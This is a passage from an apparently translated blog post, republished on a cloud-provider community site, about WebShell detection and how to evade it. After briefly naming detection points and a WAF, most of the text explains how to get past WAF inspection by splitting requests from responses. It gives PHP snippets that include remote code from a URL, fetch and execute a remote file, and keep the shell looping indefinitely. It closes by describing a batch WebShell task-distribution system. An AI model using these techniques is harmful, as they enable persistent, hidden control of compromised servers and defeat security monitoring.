A brief summary can be found, there are at least 3 links can be used for
WebShell monitoring:
WebShell file characteristics
HTTP characteristics of WebShell requests
HTTP characteristics of WebShell response
We recommend Mod Security, an open source WAF (Web Application Firewall), which can effectively intercept various attacks on the Web and intercept WebShell requests and responses on the Web Server.
Breaking the rules: request and response separation
Carefully experience the three major links of WebShell monitoring, and you will definitely gain something. In fact, the request-response link can be completely circumvented, thus avoiding the detection and killing of various WAFs. The core idea is:
Reduce character characteristics
Remote load instructions
Request response separation
No HTTP request feature
No HTTP response feature
The timing diagram of the specific realization idea is as follows:
The first link has no features
The second and fourth links are initiated by the Web Server and do not go through the WAF
The third link only executes the code, no landing documents
hacker1.com and hacker2.com can be one server
Could it be more exciting?
Based on the above ideas, I combined some features of script files and developed a set of batch WebShell management tools that support task publishing.
Load remote commands
<?php include('http://example.com/logo.png'); ?>
If the PHP environment variable allow_url_include = off, you can use the following code instead:
<?php
@file_put_contents('_',@file_get_contents('http://127.0.0.1/x.png'));
@include('-');
@delete('_');
?>
The returned content of logo.png is completely controlled by example.com.
Exploit the infinite loop
First, the WebShell only needs one request, and the subsequent instructions are periodically loaded by the WebShell itself from the remote server, which completely avoids the access behavior detection. Take PHP as an example. After the program is started, it can no longer respond to the browser's closing action and enter an endless loop of work. You can bring the following code when loading the remote code for the first time:
<?php
ignore_user_abort(true);
set_time_limit(0);
?>
As long as Apache/Nginx does not restart, this WebShell will always be running and request remote commands regularly.
Task distribution
If WebShell is only maintained through general webshell client management tools, then in most cases, WebShell is lying on the disk and its value is not fully utilized at all. This Shell management system is completely different and fully explores the value of WebShell. As the number of managed WebShells gradually increases, a set of independent management interfaces can be developed for management.
Since each WebShell has its own running ID, it can issue different instructions for different WebShells to perform different tasks:
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
